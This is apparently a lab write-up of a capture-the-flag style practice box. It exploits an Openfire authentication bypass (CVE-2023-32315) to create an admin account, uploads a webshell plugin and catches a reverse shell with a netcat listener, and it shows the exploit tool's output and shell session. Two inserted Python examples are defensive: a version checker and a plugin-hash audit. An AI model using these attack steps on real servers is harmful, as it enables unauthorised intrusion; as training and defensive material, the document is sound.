Authentication Bypass + RCE


The target Openfire instances on ports 9090 and 9091 are vulnerable to CVE-2023-32315 because of their outdated version, 4.7.3.
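As an added example (not part of the original write-up), the version-based check below flags Openfire consoles whose reported version sits in the range affected by CVE-2023-32315, so instances like the two above (ports 9090 and 9091, version 4.7.3) are surfaced by an inventory pass rather than by an exploit attempt. The fixed versions it uses (4.6.8 and 4.7.5, with 4.8.0 and later assumed clean) are what I recall from the vendor advisory and are an assumption of this example; confirm them against the advisory before relying on the result.

```python
"""
Added example, not the write-up's tooling: classify Openfire versions against
the CVE-2023-32315 affected range.

Assumption: the fixed versions below (4.6.8 on the 4.6 branch, 4.7.5 on the
4.7 branch, 4.8.0 onward unaffected) match the vendor advisory. Verify before use.
"""
from typing import Iterable, List, Tuple

# Assumed fixed versions per release branch (verify against the vendor advisory).
FIXED_BY_BRANCH = {
    (4, 6): (4, 6, 8),
    (4, 7): (4, 7, 5),
}
FIRST_SAFE_BRANCH = (4, 8)  # assumption: 4.8.0 and later shipped with the fix


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '4.7.3' (optionally suffixed, e.g. '4.7.3-beta') into an int tuple."""
    core = text.strip().split("-")[0]
    parts = core.split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(p) for p in parts)


def is_affected(version: str) -> bool:
    """True when the version is below the (assumed) fix for its branch."""
    v = parse_version(version)
    branch = v[:2]
    if branch >= FIRST_SAFE_BRANCH:
        return False
    fixed = FIXED_BY_BRANCH.get(branch)
    if fixed is None:
        # Branches older than 4.6 never received a backported fix.
        return True
    return v < fixed


def assess(inventory: Iterable[Tuple[str, int, str]]) -> List[Tuple[str, int, str, bool]]:
    """Return (host, port, version, affected) for each inventoried console."""
    return [(h, p, ver, is_affected(ver)) for h, p, ver in inventory]


# Constructed sample inventory: the write-up's two consoles plus control entries.
SAMPLE_INVENTORY = [
    ("192.168.201.96", 9090, "4.7.3"),
    ("192.168.201.96", 9091, "4.7.3"),
    ("10.0.0.5", 9090, "4.7.5"),
    ("10.0.0.6", 9090, "4.6.8"),
    ("10.0.0.7", 9090, "4.8.0"),
    ("10.0.0.8", 9090, "4.5.1"),
]

if __name__ == "__main__":
    for host, port, ver, hit in assess(SAMPLE_INVENTORY):
        print(f"{host}:{port} {ver} -> {'AFFECTED' if hit else 'ok'}")
```

The check is deliberately branch-aware: a 4.6.x install that is newer than some 4.7.x installs can still be patched, so comparing against a single cut-off version would misclassify it.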

Authentication Bypass


┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fired]
└─$ python3 CVE-2023-32315/CVE-2023-32315.py -t http://$IP:9090
 
 
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗      ██████╗ ██████╗ ██████╗  ██╗███████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗     ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚═══██╗██╔═══╝  ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝     ██████╔╝███████╗██████╔╝ ██║███████║
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝      ╚═════╝ ╚══════╝╚═════╝  ╚═╝╚══════╝
                                                                                                       
Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!
 
[..] Checking target: http://192.168.62.96:9090
Successfully retrieved JSESSIONID: node0bfvu9t6o2m0t18trp30vb6ofh1.node0 + csrf: HSvtTddM4fiZth1
User added successfully: url: http://192.168.201.96:9090 username: yd31cs password: k0apyy

Credential Created

Successfully authenticated. The web application is absurdly unstable.

Webshell Plugin


Uploading the supplied webshell plugin, Management Tool.

The uploaded webshell plugin is available under Server Settings > Management Tool

The webshell password is 123.

Code execution confirmed
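From the defender's side, the plugin upload above is what leaves the durable artefact: a new JAR in the plugin directory. The following added example (not the write-up's tooling) baselines the JARs in a directory by SHA-256 and reports anything added, removed or modified on a later pass, which would catch both an unknown webshell plugin and a tampered legitimate one. It assumes the directory to audit is supplied by the operator (Openfire's own plugin location is not hard-coded) and that the baseline is a JSON file produced by an earlier trusted run; the plugin file names in the demo are constructed.

```python
"""
Added example, not the write-up's tooling: baseline-and-diff audit of a plugin
directory to detect unexpected or altered JARs.

Assumptions: the plugin directory path is supplied by the operator; the
baseline is a JSON map {file name: sha256} written by a trusted earlier run.
"""
import hashlib
import json
import tempfile
from pathlib import Path
from typing import Dict, List


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large JARs do not load into memory."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(plugin_dir: Path) -> Dict[str, str]:
    """Map each .jar file name in plugin_dir to its SHA-256 digest."""
    return {p.name: hash_file(p) for p in sorted(plugin_dir.glob("*.jar"))}


def save_baseline(plugin_dir: Path, baseline_file: Path) -> None:
    """Record the current plugin set as the trusted baseline."""
    baseline_file.write_text(json.dumps(snapshot(plugin_dir), indent=2))


def audit(plugin_dir: Path, baseline_file: Path) -> Dict[str, List[str]]:
    """Compare the current plugin set with the baseline and report drift."""
    baseline = json.loads(baseline_file.read_text())
    current = snapshot(plugin_dir)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(
            name for name in current.keys() & baseline.keys()
            if current[name] != baseline[name]
        ),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline two plugins, then drop in a third and alter one."""
    with tempfile.TemporaryDirectory() as tmp:
        plugins = Path(tmp) / "plugins"
        plugins.mkdir()
        # Constructed stand-ins for legitimate plugins (not real JAR contents).
        (plugins / "search.jar").write_bytes(b"PK\x03\x04 constructed search plugin")
        (plugins / "monitoring.jar").write_bytes(b"PK\x03\x04 constructed monitoring plugin")
        baseline = Path(tmp) / "plugin-baseline.json"
        save_baseline(plugins, baseline)
        # Simulate an operator-unknown upload and a tampered existing plugin.
        (plugins / "managementtool.jar").write_bytes(b"PK\x03\x04 constructed unknown plugin")
        (plugins / "search.jar").write_bytes(b"PK\x03\x04 constructed search plugin, altered")
        return audit(plugins, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run the baseline step right after a known-good deployment and the audit step from a scheduled job; any non-empty "added" or "modified" list is worth an alert, since plugin installs through the admin console should be rare and change-controlled.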

Reverse Shell


Uploading the payload and making it executable.

Invoking the payload.

┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fired]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.201.96] 50278
whoami
openfire
hostname
openfire
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:61:84 brd ff:ff:ff:ff:ff:ff
    inet 192.168.201.96/24 brd 192.168.201.255 scope global ens160
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as the openfire user by exploiting CVE-2023-32315 with an RCE plugin.